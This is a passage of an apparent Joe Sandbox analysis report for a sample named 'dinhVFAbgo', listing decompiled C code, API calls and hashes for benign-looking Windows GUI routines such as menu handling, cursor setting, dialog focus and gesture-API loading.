CheckMenuItem.USER32(?,00004213,00000008), ref: 00CF0CDA
EnableMenuItem.USER32 ref: 00CF0CF4
EnableMenuItem.USER32 ref: 00CF0D23
EnableMenuItem.USER32 ref: 00CF0D32
EnableMenuItem.USER32 ref: 00CF0D41
EnableMenuItem.USER32 ref: 00CF0D91
CheckMenuItem.USER32(?,00004215,00000008), ref: 00CF0DA9

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: ItemMenu$Enable$Check
String ID:
API String ID: 1852492618-0
Opcode ID: 1c2189490d03a93424946d84ce43541b76ef75cd526ee868c51a53095242cfc7
Instruction ID: 91d1a28fa3baa5675bc238e168f763b7ee0f7856a6fefbeceea6ec0121f7685a
Opcode Fuzzy Hash: 1c2189490d03a93424946d84ce43541b76ef75cd526ee868c51a53095242cfc7
Instruction Fuzzy Hash: 1041C430741218EFDB618F51CD45AB9BBB1FF14F11F248256FB59AA1A2C770AE40CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00CBF483 Relevance: 13.6, APIs: 9, Instructions: 75
windowkeyboardCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00CBF483(intOrPtr* __ecx, void* __eflags, long _a4) {
				void* _t15;
				short _t17;
				long _t18;
				void* _t22;
				void* _t26;
				intOrPtr* _t32;
				long _t33;

				_t33 = _a4;
				_t32 = __ecx;
				if(E00CB4A8F(__ecx, __eflags, _t33) != 0) {
					L7:
					return 1;
				}
				_t26 = GetPropA( *(_t32 + 0x20),  *0xe68294);
				_t15 = GlobalLock(_t26);
				if(_t15 == 0) {
					L10:
					__eflags =  *((intOrPtr*)(_t33 + 4)) - 0x100;
					if( *((intOrPtr*)(_t33 + 4)) != 0x100) {
						L16:
						return E00CB4A60(_t33);
					}
					_t17 = GetAsyncKeyState(0x11);
					__eflags = _t17;
					if(_t17 >= 0) {
						goto L16;
					}
					__eflags =  *((intOrPtr*)(_t33 + 8)) - 9;
					if( *((intOrPtr*)(_t33 + 8)) == 9) {
						L15:
						_t18 = SendMessageA( *(_t32 + 0x20), 0x475, 0, _t33);
						__eflags = _t18;
						if(_t18 != 0) {
							goto L7;
						}
						goto L16;
					}
					__eflags =  *((intOrPtr*)(_t33 + 8)) - 0x21;
					if( *((intOrPtr*)(_t33 + 8)) == 0x21) {
						goto L15;
					}
					__eflags =  *((intOrPtr*)(_t33 + 8)) - 0x22;
					if( *((intOrPtr*)(_t33 + 8)) != 0x22) {
						goto L16;
					}
					goto L15;
				}
				if( *_t15 != 1 || SendMessageA( *(_t32 + 0x20), 0x476, 0, 0) != 0) {
					GlobalUnlock(_t26);
					goto L10;
				} else {
					GlobalUnlock(_t26);
					_t22 = RemovePropA( *(_t32 + 0x20),  *0xe68294);
					if(_t22 != 0) {
						GlobalFree(_t22);
					}
					 *0xe17a64();
					 *((intOrPtr*)( *((intOrPtr*)( *_t32 + 0x60))))();
					goto L7;
				}
			}

0x00cbf488
0x00cbf48d
0x00cbf496
0x00cbf501
0x00000000
0x00cbf503
0x00cbf4a7
0x00cbf4aa
0x00cbf4b2
0x00cbf512
0x00cbf512
0x00cbf519
0x00cbf54f
0x00000000
0x00cbf552
0x00cbf51d
0x00cbf523
0x00cbf526
0x00000000
0x00000000
0x00cbf528
0x00cbf52c
0x00cbf53a
0x00cbf545
0x00cbf54b
0x00cbf54d
0x00000000
0x00000000
0x00000000
0x00cbf54d
0x00cbf52e
0x00cbf532
0x00000000
0x00000000
0x00cbf534
0x00cbf538
0x00000000
0x00000000
0x00000000
0x00cbf538
0x00cbf4b7
0x00cbf50c
0x00000000
0x00cbf4cf
0x00cbf4d0
0x00cbf4df
0x00cbf4e7
0x00cbf4ea
0x00cbf4ea
0x00cbf4f7
0x00cbf4ff
0x00000000
0x00cbf4ff

APIs

GetPropA.USER32 ref: 00CBF4A1
GlobalLock.KERNEL32 ref: 00CBF4AA
SendMessageA.USER32(?,00000476,00000000,00000000), ref: 00CBF4C5
GlobalUnlock.KERNEL32(00000000), ref: 00CBF4D0
RemovePropA.USER32 ref: 00CBF4DF
GlobalFree.KERNEL32 ref: 00CBF4EA
GlobalUnlock.KERNEL32(00000000), ref: 00CBF50C
GetAsyncKeyState.USER32(00000011), ref: 00CBF51D
SendMessageA.USER32(?,00000475,00000000,?), ref: 00CBF545

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Global$MessagePropSendUnlock$AsyncFreeLockRemoveState
String ID:
API String ID: 723318029-0
Opcode ID: 082b56a2bbb350f6213f2500843a5c1c66e9f87aa5f605cb163b928e2ecab0c9
Instruction ID: d8ae999bd16da9d86cf2be0c2fcc8f0981612c80bfed8b0965e43b034ce7761e
Opcode Fuzzy Hash: 082b56a2bbb350f6213f2500843a5c1c66e9f87aa5f605cb163b928e2ecab0c9
Instruction Fuzzy Hash: F7219231244601AFDB351F36DC88BE637BDFB05B81F00802DF596A2260DB709A4AEA50

Uniqueness

Uniqueness Score: -1.00%

Function 00D0532F Relevance: 13.6, APIs: 9, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00D0532F(void* __ecx) {
				struct tagPOINT _v12;
				void* __ebx;
				void* __ebp;
				void* _t23;
				struct HICON__* _t30;
				RECT* _t47;
				RECT* _t49;
				void* _t51;

				_push(__ecx);
				_push(__ecx);
				_t51 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x250)) == 0) {
					L5:
					_t47 = _t51 + 0x2fc;
					__eflags = IsRectEmpty(_t47);
					if(__eflags != 0) {
						L11:
						_t23 = E00CB236A(0, _t51, __eflags);
					} else {
						_v12.x = 0;
						_v12.y = 0;
						GetCursorPos( &_v12);
						ScreenToClient( *(_t51 + 0x20),  &_v12);
						_push(_v12.y);
						__eflags = PtInRect(_t47, _v12.x);
						if(__eflags == 0) {
							goto L11;
						} else {
							__eflags =  *((intOrPtr*)(_t51 + 0x29f8)) - 1;
							if( *((intOrPtr*)(_t51 + 0x29f8)) != 1) {
								_t30 =  *(E00CC19ED() + 0xf4);
							} else {
								_t30 =  *(E00CC19ED() + 0xf0);
							}
							SetCursor(_t30);
							goto L4;
						}
					}
				} else {
					_t49 = __ecx + 0x2bc;
					if(IsRectEmpty(_t49) != 0) {
						goto L5;
					} else {
						_v12.x = 0;
						_v12.y = 0;
						GetCursorPos( &_v12);
						ScreenToClient( *(_t51 + 0x20),  &_v12);
						_push(_v12.y);
						if(PtInRect(_t49, _v12) == 0) {
							goto L5;
						} else {
							SetCursor( *(E00CC19ED() + 0xf0));
							L4:
							_t23 = 1;
						}
					}
				}
				return _t23;
			}

0x00d05332
0x00d05333
0x00d05336
0x00d05341
0x00d05398
0x00d05398
0x00d053a5
0x00d053a7
0x00d053fb
0x00d053fd
0x00d053a9
0x00d053ac
0x00d053b0
0x00d053b3
0x00d053c0
0x00d053c6
0x00d053d3
0x00d053d5
0x00000000
0x00d053d7
0x00d053d7
0x00d053de
0x00d053f2
0x00d053e0
0x00d053e5
0x00d053e5
0x00d0538d
0x00000000
0x00d0538d
0x00d053d5
0x00d05343
0x00d05343
0x00d05352
0x00000000
0x00d05354
0x00d05357
0x00d0535b
0x00d0535e
0x00d0536b
0x00d05371
0x00d05380
0x00000000
0x00d05382
0x00d0538d
0x00d0538d
0x00d05395
0x00d05395
0x00d05380
0x00d05352
0x00d05406

APIs

IsRectEmpty.USER32 ref: 00D0534A
GetCursorPos.USER32(?), ref: 00D0535E
ScreenToClient.USER32 ref: 00D0536B
PtInRect.USER32(?,?,?), ref: 00D05378
SetCursor.USER32(?), ref: 00D0538D
IsRectEmpty.USER32 ref: 00D0539F
GetCursorPos.USER32(?), ref: 00D053B3
ScreenToClient.USER32 ref: 00D053C0
PtInRect.USER32(?,?,?), ref: 00D053CD

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Rect$Cursor$ClientEmptyScreen
String ID:
API String ID: 78079831-0
Opcode ID: e2f12f5a9ae572eb9466c440d6f2e71548f390bdd9b62cf41d95ad6f34a0a7f8
Instruction ID: 778574d7e2ff501f1ce7855c996a0125c4d32bfcf84a99eb5633747fa8050a72
Opcode Fuzzy Hash: e2f12f5a9ae572eb9466c440d6f2e71548f390bdd9b62cf41d95ad6f34a0a7f8
Instruction Fuzzy Hash: 5B216071504609EFCB119FA1DC88EEFBBB8FF45741F0444B9E98AE2060D7709945EB20

Uniqueness

Uniqueness Score: -1.00%

Function 00CBF250 Relevance: 13.6, APIs: 9, Instructions: 64
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00CBF250(intOrPtr* __ecx, int _a4, intOrPtr _a8) {
				void* __ebx;
				void* __ebp;
				int _t23;
				void* _t30;
				signed int _t31;
				intOrPtr* _t36;
				struct HWND__* _t37;
				struct HWND__* _t38;

				_t36 = __ecx;
				if(( *(__ecx + 0x84) & 0x01000020) == 0) {
					L8:
					return E00CB236A(_t30, _t36, _t47);
				}
				_t37 = GetDlgItem( *(__ecx + 0x20), _a4);
				if(_t37 == 0 || (GetWindowLongA(_t37, 0xfffffff0) & 0x10000000) == 0 || IsWindowEnabled(_t37) == 0) {
					_t31 = 0;
					while(1) {
						_t38 = GetDlgItem( *(_t36 + 0x20),  *(0xe1a108 + _t31 * 4));
						if((GetWindowLongA(_t38, 0xfffffff0) & 0x10000000) != 0 && IsWindowEnabled(_t38) != 0) {
							break;
						}
						_t31 = _t31 + 1;
						_t47 = _t31 - 4;
						if(_t31 < 4) {
							continue;
						}
						goto L8;
					}
					_t23 = IsWindowEnabled(GetFocus());
					__eflags = _t23;
					if(_t23 == 0) {
						SetFocus(_t38);
					}
					 *0xe17a64(0x401,  *(0xe1a108 + _t31 * 4), _a8);
					return  *((intOrPtr*)( *((intOrPtr*)( *_t36 + 0x11c))))();
				} else {
					goto L8;
				}
			}

0x00cbf256
0x00cbf262
0x00cbf2c6
0x00000000
0x00cbf2c8
0x00cbf270
0x00cbf274
0x00cbf291
0x00cbf293
0x00cbf2a3
0x00cbf2b3
0x00000000
0x00000000
0x00cbf2c0
0x00cbf2c1
0x00cbf2c4
0x00000000
0x00000000
0x00000000
0x00cbf2c4
0x00cbf2db
0x00cbf2e1
0x00cbf2e3
0x00cbf2e6
0x00cbf2e6
0x00cbf305
0x00000000
0x00000000
0x00000000
0x00000000

APIs

GetDlgItem.USER32 ref: 00CBF26A
GetWindowLongA.USER32 ref: 00CBF279
IsWindowEnabled.USER32(00000000), ref: 00CBF287
GetDlgItem.USER32 ref: 00CBF29D
GetWindowLongA.USER32 ref: 00CBF2A8
IsWindowEnabled.USER32(00000000), ref: 00CBF2B6
GetFocus.USER32 ref: 00CBF2D4
IsWindowEnabled.USER32(00000000), ref: 00CBF2DB
SetFocus.USER32(00000000), ref: 00CBF2E6

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Window$Enabled$FocusItemLong
String ID:
API String ID: 1558694495-0
Opcode ID: 6179c0042a685fa6d2abc2631631111c02f3563876580833b589fb1140e6de88
Instruction ID: 67c8820c498a24fb7b393822778d480826f50171865c0b1efebdef3552ea9cbc
Opcode Fuzzy Hash: 6179c0042a685fa6d2abc2631631111c02f3563876580833b589fb1140e6de88
Instruction Fuzzy Hash: BC11E6352085216FDB061F6A9C4CBEE7BB9FF05B51F048135F955E2270CB218D16CAD1

Uniqueness

Uniqueness Score: -1.00%

Function 00CC8D13 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E00CC8D13(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
				int _t83;
				signed int _t86;
				signed int _t88;
				intOrPtr _t92;
				intOrPtr _t94;
				void* _t102;
				intOrPtr _t125;
				intOrPtr* _t127;
				signed int _t129;
				signed int _t132;
				intOrPtr _t134;
				int _t136;
				void* _t140;
				intOrPtr _t143;
				intOrPtr _t169;
				intOrPtr _t174;
				void* _t177;
				intOrPtr _t178;
				int _t180;
				signed int _t182;
				void* _t183;
				intOrPtr* _t185;
				intOrPtr _t188;
				intOrPtr _t189;
				void* _t193;
				void* _t197;

				_t179 = __edi;
				_t177 = __edx;
				_t143 = __ecx;
				_t140 = __ebx;
				_push(__esi);
				_t188 = __ecx;
				_push(__edi);
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx + 0x20)) == 0) {
					E00CAA4E7(_t140, _t143, _t179, _t188, __eflags);
					asm("int3");
					_push(0x2c);
					E00DDD55F(0xe094e6, _t140, _t179, _t188);
					_t189 = _t143;
					 *((intOrPtr*)(_t197 - 0x2c)) = _t189;
					_t180 = 0;
					 *(_t197 - 0x34) =  *(_t197 + 8);
					__eflags =  *(_t197 + 0x1c);
					if( *(_t197 + 0x1c) == 0) {
						__eflags =  *(_t197 + 0x20);
						if( *(_t197 + 0x20) != 0) {
							_t180 = 2;
						}
					} else {
						_t180 = 1;
					}
					 *((intOrPtr*)(_t197 - 0x38)) =  *((intOrPtr*)(E00CC19ED() + 0x28));
					_t83 = E00CC1A50(_t140, _t180, _t189, __eflags);
					 *(_t197 - 0x28) = _t83;
					 *((intOrPtr*)(_t197 - 0x24)) =  *((intOrPtr*)( *_t83 + 0x1bc));
					_t190 = _t197 + 0xc;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t182 =  *(_t197 - 0x34);
					 *0xe17a64(_t182, _t189, _t180, _t197 - 0x38);
					_t86 =  *((intOrPtr*)(_t197 - 0x24))();
					__eflags = _t86;
					if(_t86 != 0) {
						_t190 =  *((intOrPtr*)(_t197 - 0x2c));
						 *(_t197 - 0x28) = 0;
						_t88 = _t190 + 0xc4;
						__eflags = _t88;
						if(_t88 == 0) {
							L28:
							 *0xe17a64( *((intOrPtr*)(_t197 - 0x38)));
							 *(_t197 - 0x28) =  *((intOrPtr*)( *((intOrPtr*)( *_t182 + 0x30))))();
							_t92 = E00CBA3B4(_t182, 1);
							 *((intOrPtr*)(_t197 - 0x24)) = _t92;
							 *0xe17a64(0x11);
							_t94 =  *((intOrPtr*)( *((intOrPtr*)( *_t182 + 0x24))))();
							_t193 = _t197 + 0xc;
							 *((intOrPtr*)(_t197 - 0x2c)) = _t94;
							_t183 = _t197 - 0x20;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							InflateRect(_t197 - 0x20, 0xffffffff, 0xfffffffe);
							OffsetRect(_t197 - 0x20, 0, 0xfffffffe);
							__eflags =  *(_t197 + 0x1c);
							if(__eflags != 0) {
								OffsetRect(_t197 - 0x20, 1, 1);
							}
							E00CA2ABC(_t140, _t197 - 0x30, _t183, _t193, __eflags);
							_t182 =  *(_t197 - 0x34);
							 *(_t197 - 4) =  *(_t197 - 4) & 0x00000000;
							_t102 = E00CC1854(_t182, _t197 - 0x30, _t197 - 0x20, 0x25);
							_t69 = _t197 - 4;
							 *_t69 =  *(_t197 - 4) | 0xffffffff;
							__eflags =  *_t69;
							E00CA2975(_t102,  *((intOrPtr*)(_t197 - 0x30)) - 0x10);
							 *0xe17a64( *(_t197 - 0x28), "...");
							 *((intOrPtr*)( *((intOrPtr*)( *_t182 + 0x30))))();
							E00CBA3B4(_t182,  *((intOrPtr*)(_t197 - 0x24)));
							_t190 =  *((intOrPtr*)( *_t182 + 0x28));
							 *0xe17a64( *((intOrPtr*)(_t197 - 0x2c)));
							 *((intOrPtr*)( *((intOrPtr*)( *_t182 + 0x28))))();
						} else {
							__eflags =  *(_t88 + 4);
							if( *(_t88 + 4) == 0) {
								goto L28;
							} else {
								__eflags =  *(_t190 + 0x90);
								if( *(_t190 + 0x90) != 0) {
									_t132 =  *(_t190 + 0xc0);
									__eflags = _t132;
									if(_t132 == 0) {
										 *(_t197 - 0x28) = 1;
									} else {
										__eflags = _t132 == 1;
										if(_t132 == 1) {
											 *(_t197 - 0x28) = 0;
										}
									}
								}
								asm("cdq");
								asm("cdq");
								asm("cdq");
								 *((intOrPtr*)(_t197 - 0x24)) = ( *((intOrPtr*)(_t197 + 0xc)) +  *((intOrPtr*)(_t197 + 0x14)) - _t177 >> 1) - ( *((intOrPtr*)(_t190 + 0xa4)) - _t177 >> 1);
								asm("cdq");
								_t169 = ( *((intOrPtr*)(_t197 + 0x10)) +  *((intOrPtr*)(_t197 + 0x18)) - _t177 >> 1) - ( *((intOrPtr*)(_t190 + 0xa8)) - _t177 >> 1);
								__eflags =  *(_t197 + 0x1c);
								 *((intOrPtr*)(_t197 - 0x30)) = _t169;
								if(__eflags == 0) {
									_t125 =  *((intOrPtr*)(_t197 - 0x24));
								} else {
									_t127 = E00CC1A50(_t140, _t182, _t190, __eflags);
									 *0xe17a64();
									_t129 =  *((intOrPtr*)( *((intOrPtr*)( *_t127 + 0x2ec))))();
									_t169 =  *((intOrPtr*)(_t197 - 0x30));
									__eflags = _t129;
									_t182 =  *(_t197 - 0x34);
									_t190 =  *((intOrPtr*)(_t197 - 0x2c));
									_t125 =  *((intOrPtr*)(_t197 - 0x24));
									if(_t129 != 0) {
										_t125 = _t125 + 1;
										_t169 = _t169 + 1;
									}
								}
								__eflags = _t182;
								if(__eflags != 0) {
									_t178 =  *((intOrPtr*)(_t182 + 4));
								} else {
									_t178 = 0;
								}
								_push(0);
								_push(_t169);
								_push(_t125);
								_push(_t178);
								_push( *(_t197 - 0x28));
								_push( *((intOrPtr*)(_t190 + 0xc8)));
								E00CC9622(_t140, _t169, _t182, _t190, __eflags);
							}
						}
					}
					return E00DDD50E(_t140, _t182, _t190);
				} else {
					_t174 =  *((intOrPtr*)(__ecx + 0xa4)) + 8;
					_t134 = 0x14;
					if(_t174 >= _t134) {
						_t134 = _t174;
					}
					_push(_t140);
					 *((intOrPtr*)(_t188 + 0x80)) = _t134;
					E00CB7A83(_t188, 0, 0, 0, 0, 0, 0x27);
					_t185 = _t188 + 0x94;
					_push(_t185);
					if( *((intOrPtr*)(_t188 + 0xc0)) == 0) {
						_t136 = SetRectEmpty();
					} else {
						GetWindowRect( *(_t188 + 0x20), ??);
						 *_t185 =  *((intOrPtr*)(_t188 + 0x9c)) -  *((intOrPtr*)(_t188 + 0x80));
						_t136 = E00CBA172(_t188, _t185);
					}
					return _t136;
				}
			}

0x00cc8d13
0x00cc8d13
0x00cc8d13
0x00cc8d13
0x00cc8d13
0x00cc8d14
0x00cc8d16
0x00cc8d19
0x00cc8d84
0x00cc8d89
0x00cc8d8a
0x00cc8d91
0x00cc8d96
0x00cc8d98
0x00cc8d9e
0x00cc8da0
0x00cc8da3
0x00cc8da6
0x00cc8dab
0x00cc8dae
0x00cc8db2
0x00cc8db2
0x00cc8da8
0x00cc8da8
0x00cc8da8
0x00cc8dbb
0x00cc8dbe
0x00cc8dc3
0x00cc8dd7
0x00cc8ddc
0x00cc8de1
0x00cc8de2
0x00cc8de3
0x00cc8de4
0x00cc8de5
0x00cc8de9
0x00cc8df2
0x00cc8df5
0x00cc8df7
0x00cc8dfd
0x00cc8e02
0x00cc8e05
0x00cc8e0b
0x00cc8e0d
0x00cc8ed6
0x00cc8ee0
0x00cc8eee
0x00cc8ef1
0x00cc8efa
0x00cc8f02
0x00cc8f0a
0x00cc8f0c
0x00cc8f0f
0x00cc8f12
0x00cc8f15
0x00cc8f1e
0x00cc8f1f
0x00cc8f20
0x00cc8f21
0x00cc8f2f
0x00cc8f35
0x00cc8f39
0x00cc8f43
0x00cc8f43
0x00cc8f51
0x00cc8f56
0x00cc8f5c
0x00cc8f69
0x00cc8f71
0x00cc8f71
0x00cc8f71
0x00cc8f78
0x00cc8f87
0x00cc8f8f
0x00cc8f96
0x00cc8fa0
0x00cc8fa5
0x00cc8fad
0x00cc8e13
0x00cc8e13
0x00cc8e16
0x00000000
0x00cc8e1c
0x00cc8e1c
0x00cc8e22
0x00cc8e2b
0x00cc8e2b
0x00cc8e2e
0x00cc8e3a
0x00cc8e30
0x00cc8e30
0x00cc8e33
0x00cc8e35
0x00cc8e35
0x00cc8e33
0x00cc8e2e
0x00cc8e47
0x00cc8e52
0x00cc8e61
0x00cc8e64
0x00cc8e6f
0x00cc8e76
0x00cc8e78
0x00cc8e7c
0x00cc8e7f
0x00cc8eb0
0x00cc8e81
0x00cc8e81
0x00cc8e92
0x00cc8e9a
0x00cc8e9c
0x00cc8e9f
0x00cc8ea1
0x00cc8ea4
0x00cc8ea7
0x00cc8eaa
0x00cc8eac
0x00cc8ead
0x00cc8ead
0x00cc8eaa
0x00cc8eb3
0x00cc8eb5
0x00cc8ebb
0x00cc8eb7
0x00cc8eb7
0x00cc8eb7
0x00cc8ebe
0x00cc8ec0
0x00cc8ec1
0x00cc8ec2
0x00cc8ec3
0x00cc8ec6
0x00cc8ecc
0x00cc8ecc
0x00cc8e16
0x00cc8e0d
0x00cc8fb4
0x00cc8d21
0x00cc8d29
0x00cc8d2c
0x00cc8d2f
0x00cc8d31
0x00cc8d31
0x00cc8d33
0x00cc8d38
0x00cc8d45
0x00cc8d50
0x00cc8d57
0x00cc8d58
0x00cc8d7c
0x00cc8d5a
0x00cc8d5d
0x00cc8d72
0x00cc8d74
0x00cc8d74
0x00cc8d7b
0x00cc8d7b

APIs

GetWindowRect.USER32 ref: 00CC8D5D
SetRectEmpty.USER32(?), ref: 00CC8D7C

Part of subcall function 00CBA3B4: SetBkMode.GDI32(?,?), ref: 00CBA3CA
Part of subcall function 00CBA3B4: SetBkMode.GDI32(?,?), ref: 00CBA3DE

__EH_prolog3_GS.LIBCMT ref: 00CC8D91
InflateRect.USER32(?,000000FF,000000FE), ref: 00CC8F21
OffsetRect.USER32(?,00000000,000000FE), ref: 00CC8F2F
OffsetRect.USER32(?,00000001,00000001), ref: 00CC8F43

Strings

..., xrefs: 00CC8F49

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Rect$ModeOffset$EmptyH_prolog3_InflateWindow
String ID: ...
API String ID: 3827798281-440645147
Opcode ID: 9722638c5abb0d485a35640b1ed4d9e59c47a78c0950079af6a27fd5614b360c
Instruction ID: 251cd685024ef5d8972dd67ea5506a30465afc40b4b8ce2b9310e9417b611185
Opcode Fuzzy Hash: 9722638c5abb0d485a35640b1ed4d9e59c47a78c0950079af6a27fd5614b360c
Instruction Fuzzy Hash: 0D816A31A006159FCF14DFA8C945BEEBBB6FF88710F18411DF85AAB290DB70AA05CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00CB3660 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 218libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(user32.dll), ref: 00CB3683
GetProcAddress.KERNEL32(00000000,GetGestureInfo), ref: 00CB36B8
GetProcAddress.KERNEL32(00000000,CloseGestureInfoHandle), ref: 00CB36E0
ScreenToClient.USER32 ref: 00CB376C

Strings

CloseGestureInfoHandle, xrefs: 00CB36D2
GetGestureInfo, xrefs: 00CB36AA
user32.dll, xrefs: 00CB3679

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: AddressProc$ClientHandleModuleScreen
String ID: CloseGestureInfoHandle$GetGestureInfo$user32.dll
API String ID: 471820996-2905070798
Opcode ID: 8ba52ee81cf017908f95fa805c6566f6766d07b3abfce80f0f3fb10758c2dd30
Instruction ID: 504a917edf463831afa1dfbc929cf4be5163018cb7bb4bd809f322b04c060056
Opcode Fuzzy Hash: 8ba52ee81cf017908f95fa805c6566f6766d07b3abfce80f0f3fb10758c2dd30
Instruction Fuzzy Hash: 4781AF74A00226EFCB15CF6AD954AA9BBB5FB08310F004169F855A77A0DB31EB18DF80

Uniqueness

Uniqueness Score: -1.00%

Function 00CC3100 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 196
comCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00CC3100(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, signed int _a8, intOrPtr _a12, signed int _a16, signed char _a20, signed int _a24, intOrPtr _a28, signed int _a32, intOrPtr _a36) {
				signed int _v4;
				intOrPtr _v16;
				char _v20;
				struct _OSVERSIONINFOA _v164;
				signed int** _v168;
				signed int _v172;
				char _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				signed int _t96;
				signed int _t100;
				void* _t103;
				signed int _t107;
				void* _t118;
				signed int _t121;
				signed int _t124;
				signed int _t138;
				signed int _t141;
				signed int _t143;
				char* _t149;
				signed int** _t154;
				intOrPtr* _t155;
				char* _t162;
				intOrPtr _t164;
				signed int _t166;
				signed int _t167;
				signed int* _t169;
				void* _t173;
				signed int _t174;
				void* _t176;

				_t176 = __eflags;
				_push(0xac);
				E00DDD55F(0xe0903b, __ebx, __edi, __esi);
				_t164 = __ecx;
				_v180 = __ecx;
				_t143 = _a24;
				_t166 = _a32;
				_v172 = _a16;
				_v184 = __ecx;
				E00CBCF63(__ecx, _t176, 0, _a28);
				_v4 = _v4 & 0x00000000;
				_t145 = __ecx + 0xc8;
				 *((intOrPtr*)(__ecx)) = 0xe1b0d4;
				E00CA67E1(__ecx + 0xc8);
				_v4 = 1;
